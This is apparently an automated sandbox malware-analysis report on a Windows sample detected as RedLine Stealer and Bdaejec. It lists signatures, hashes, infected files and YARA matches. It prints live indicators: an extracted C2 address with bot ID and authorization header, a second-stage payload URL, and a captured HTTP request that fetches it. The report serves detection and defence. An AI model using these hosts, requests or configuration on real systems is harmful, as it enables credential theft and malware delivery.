Windows Analysis Report
FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe

Overview

General Information

Sample name: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe
Analysis ID: 1482558
MD5: c2bbbc6bb9408f1811a956ae26572f62
SHA1: aba71a8c8738a382b3acc454a8ae70a794d760b7
SHA256: 9bc2f72646fcc040a0c11d469f353931f3d6eb606f8fa60bdcbd0fa091e59968
Tags: exe, RedLineStealer

Detection

Bdaejec, RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Yara detected Bdaejec
Yara detected RedLine Stealer
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has a writeable .text section
Uses known network protocols on non-standard ports
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Classification

Name: RedLine Stealer
Description: RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

AV Detection

Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Avira: detected
Source: http://ddos.dnsnb8.net/ URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rar URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarz Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.raru Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarA Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarcC: Avira URL Cloud: Label: malware
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files\7-Zip\Uninstall.exe Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe Avira: detection malicious, Label: TR/Dldr.Small.Z.haljq
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe Avira: detection malicious, Label: W32/Jadtre.B
Source: 00000000.00000003.2038029261.00000000006F5000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: RedLine {"C2 url": "193.106.191.123:34450", "Bot Id": "50n", "Authorization Header": "d61a9ba1568b3b8e34c959aa0f254969"}
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Joe Sandbox ML: detected
Source: C:\Program Files\7-Zip\Uninstall.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe Joe Sandbox ML: detected
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Joe Sandbox ML: detected

Compliance

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Unpacked PE file: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.400000.0.unpack
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3276908752.0000000004CE9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3273371732.00000000006FE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb< source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3276908752.0000000004CC0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.ServiceModel.pdb693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32^ source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3276908752.0000000004CE9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: _.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000003.2038029261.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275112639.0000000002313000.00000004.00000020.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275191673.00000000024A0000.00000004.08000000.00040000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3276574886.0000000003605000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\yolarogi62\xemojecu_butupibojeyet\wefiwuroxiv\xuruka.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe
Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr
Source: Binary string: `C:\yolarogi62\xemojecu_butupibojeyet\wefiwuroxiv\xuruka.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe
Source: Binary string: System.ServiceModel.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3276908752.0000000004D38000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3276908752.0000000004CC0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdbW.: source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3273371732.0000000000732000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3273371732.0000000000732000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.ServiceModel.pdbu source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3273371732.0000000000732000.00000004.00000020.00020000.00000000.sdmp

Spreading

Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe System file written: C:\Program Files\7-Zip\Uninstall.exe
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe Code function: 1_2_00F429E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose, 1_2_00F429E2
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe Code function: 1_2_00F42B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread, 1_2_00F42B8C
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\

Networking

Source: Malware configuration extractor URLs: 193.106.191.123:34450
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 799
Source: global traffic TCP traffic: 192.168.2.5:49704 -> 44.221.84.105:799
Source: global traffic TCP traffic: 192.168.2.5:49709 -> 193.106.191.123:34450
Source: Joe Sandbox View IP Address: 44.221.84.105
Source: Joe Sandbox View IP Address: 193.106.191.123
Source: Joe Sandbox View ASN Name: BOSPOR-ASRU
Source: global traffic HTTP traffic detected:
GET /cj//k1.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 193.106.191.123
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe Code function: 1_2_00F41099 wsprintfA,WinExec,lstrlen,wsprintfA,wsprintfA,URLDownloadToFileA,lstrlen,Sleep, 1_2_00F41099
Source: global traffic DNS traffic detected: DNS query: ddos.dnsnb8.net
Source: IoUNtL.exe, 00000001.00000003.2016658609.0000000000840000.00000004.00001000.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000002.2257080377.0000000000F43000.00000002.00000001.01000000.00000004.sdmp String found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
Source: IoUNtL.exe, 00000001.00000002.2256665001.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000003.2027571352.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000003.2027529653.00000000008EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net/
Source: IoUNtL.exe, 00000001.00000003.2027416860.0000000000956000.00000004.00000020.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000002.2256774762.0000000000945000.00000004.00000020.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000003.2027571352.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000002.2257143065.000000000245A000.00000004.00000010.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000003.2027529653.00000000008EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
Source: IoUNtL.exe, 00000001.00000003.2027416860.0000000000956000.00000004.00000020.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000002.2256774762.0000000000945000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarA
Source: IoUNtL.exe, 00000001.00000003.2027416860.0000000000956000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarcC:
Source: IoUNtL.exe, 00000001.00000002.2256665001.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000003.2027571352.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000003.2027529653.00000000008EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.raru
Source: IoUNtL.exe, 00000001.00000002.2257143065.000000000245A000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarz
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002728000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002760000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.00000000027C2000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002791000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002728000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id1LR
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002760000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.00000000027C2000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002791000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002728000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id1Response(
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002760000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.00000000027C2000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002791000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002728000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id2LR
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002760000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.00000000027C2000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002791000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002728000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id2Response(
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002760000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.00000000027C2000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002791000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002728000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id3LR
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002760000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.00000000027C2000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002791000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002728000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id3Response(
Source: Amcache.hve.1.dr String found in binary or memory: http://upx.sf.net
Source: SciTE.exe.1.dr String found in binary or memory: http://www.activestate.com
Source: SciTE.exe.1.dr String found in binary or memory: http://www.activestate.comHolger
Source: SciTE.exe.1.dr String found in binary or memory: http://www.baanboard.com
Source: SciTE.exe.1.dr String found in binary or memory: http://www.baanboard.comBrendon
Source: SciTE.exe.1.dr String found in binary or memory: http://www.develop.com
Source: SciTE.exe.1.dr String found in binary or memory: http://www.develop.comDeepak
Source: SciTE.exe.1.dr String found in binary or memory: http://www.lua.org
Source: SciTE.exe.1.dr String found in binary or memory: http://www.rftp.com
Source: SciTE.exe.1.dr String found in binary or memory: http://www.rftp.comJosiah
Source: SciTE.exe.1.dr String found in binary or memory: http://www.scintilla.org
Source: SciTE.exe.1.dr String found in binary or memory: http://www.scintilla.org/scite.rng
Source: SciTE.exe.1.dr String found in binary or memory: http://www.spaceblue.com
Source: SciTE.exe.1.dr String found in binary or memory: http://www.spaceblue.comMathias
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000003.2038029261.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275112639.0000000002313000.00000004.00000020.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3277082749.0000000005370000.00000004.08000000.00040000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275191673.00000000024A0000.00000004.08000000.00040000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3276574886.0000000003605000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ip.sb/ip
Source: IoUNtL.exe, 00000001.00000003.2027416860.0000000000956000.00000004.00000020.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000002.2256774762.0000000000945000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com5
Source: SciTE.exe.1.dr String found in binary or memory: https://www.smartsharesystems.com/
Source: SciTE.exe.1.dr String found in binary or memory: https://www.smartsharesystems.com/Morten
Source: SciTE.exe.1.dr Binary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \ memstr_290dccd1-9

System Summary

Source: 0.3.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2110000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.610e50.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2353bbe.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.362f590.6.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0ee8.4.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0ee8.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2354aa6.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3606458.7.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2354aa6.2.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.5370000.9.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.3.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.6f54f8.1.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0000.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0000.5.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.5370000.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
